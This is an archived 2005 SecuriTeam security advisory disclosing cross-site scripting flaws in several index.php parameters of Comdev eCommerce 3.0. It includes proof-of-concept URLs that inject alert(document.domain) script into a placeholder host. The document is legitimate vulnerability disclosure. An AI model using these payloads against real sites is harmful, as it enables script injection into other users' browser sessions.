Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[UNIX] Comdev eCommerce Cross Site Scripting

Subject: [UNIX] Comdev eCommerce Cross Site Scripting
Date: 26 Jan 2005 18:04:08 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Comdev eCommerce Cross Site Scripting
------------------------------------------------------------------------


SUMMARY

 <http://www.comdevweb.com/ecommerce.php> Comdev eCommerce 3.0 is "a 
ready-made, flexible ordering system that will allow you to sell any type 
of product with a few simple clicks".

The Comdev eCommerce has been found to contain multiple cross site 
scripting vulnerabilities that allow a remote attacker to include 
arbitrary HTML/JavaScript into existing eCommerce pages.

DETAILS

Vulnerable Systems:
 * Comdev eCommerce version 3.0

The vulnerability is caused due to missing validation of input supplied to 
"start", "category_id", "keyword , "pageaction" and "product_id" 
parameters in "index.php". This can be exploited by including arbitrary 
HTML or script code in the parameters, which will cause it to be executed 
in a user's browser session when viewed.

Proof of concept:
The following URLs can be used to trigger the cross site scripting 
vulnerabilities:
http://vulnerable/index.php?product_id=477&pageactionprev=viewpricelist
&start=0"><script>alert(document.domain);</script>&category_id=&keyword=

http://vulnerable/index.php?product_id=477&pageactionprev=viewpricelist
&start=0&category_id="><script>alert(document.domain);</script>&keyword=

http://vulnerable/index.php?product_id=477&pageactionprev=viewpricelist
&start=0&category_id=&keyword="><script>alert(document.domain);</script>

http://vulnerable/index.php?pageaction=viewpricelist";><script>alert(document.domain);</script>

http://vulnerable/index.php?product_id=477";><script>alert(document.domain);</script>
&pageactionprev=viewpricelist&start=0&category_id=&keyword=


ADDITIONAL INFORMATION

The information has been provided by  <mailto:smok3f00@gmail.com> SmOk3.
The original article can be found at:  
<http://www.systemsecure.org/wwwboard/messages/222.html> 
http://www.systemsecure.org/wwwboard/messages/222.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Comdev eCommerce Cross Site Scripting, SecuriTeam <=